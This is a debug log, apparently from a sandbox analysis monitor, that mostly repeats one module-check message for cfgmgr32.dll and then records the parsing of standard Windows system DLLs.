2020-03-24 10:16:34,809 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,809 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,809 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,839 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,839 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,839 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,839 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,871 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,871 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,871 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,871 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,887 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,887 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,887 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,887 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,903 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,903 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,903 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,903 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,948 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,948 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,948 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,948 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,964 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,964 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,964 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,964 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,980 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,980 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,980 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,980 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,996 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,996 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:34,996 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,042 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,042 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,042 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,042 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,073 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,073 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,073 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,073 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,151 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,151 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,151 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,151 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,183 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,183 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,183 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,183 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,198 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,198 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,198 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,198 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,260 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,260 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,260 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,276 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,276 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,276 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,276 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,308 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,308 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,308 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,308 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,323 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,323 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,323 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,323 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,338 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,338 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,338 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,338 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,338 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,385 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,385 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,433 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,433 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,433 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,463 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,463 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,463 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,480 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,480 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,494 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,494 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,494 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:35,494 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\devobj.dll
2020-03-24 10:16:35,510 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\devobj.dll
2020-03-24 10:16:35,510 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\mpr.dll
2020-03-24 10:16:35,510 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\mpr.dll
2020-03-24 10:16:35,510 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:16:35,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:16:35,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:35,526 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:16:35,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:16:35,542 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcp60.dll
2020-03-24 10:16:35,542 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcp60.dll
2020-03-24 10:16:35,542 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:35,558 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:35,558 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:35,558 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:35,572 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:35,572 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:35,572 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:35,588 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:16:35,588 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:16:35,605 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:16:35,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:16:35,605 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
2020-03-24 10:16:35,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
2020-03-24 10:16:35,619 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\mswsock.dll
2020-03-24 10:16:35,619 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\mswsock.dll
2020-03-24 10:16:35,635 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\WSHTCPIP.DLL
2020-03-24 10:16:35,635 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\WSHTCPIP.DLL
2020-03-24 10:16:35,635 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\nlaapi.dll
2020-03-24 10:16:35,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\nlaapi.dll
2020-03-24 10:16:35,651 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\NapiNSP.dll
2020-03-24 10:16:35,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\NapiNSP.dll
2020-03-24 10:16:35,667 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\pnrpnsp.dll
2020-03-24 10:16:35,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\pnrpnsp.dll
2020-03-24 10:16:35,667 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\dnsapi.dll
2020-03-24 10:16:35,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\dnsapi.dll
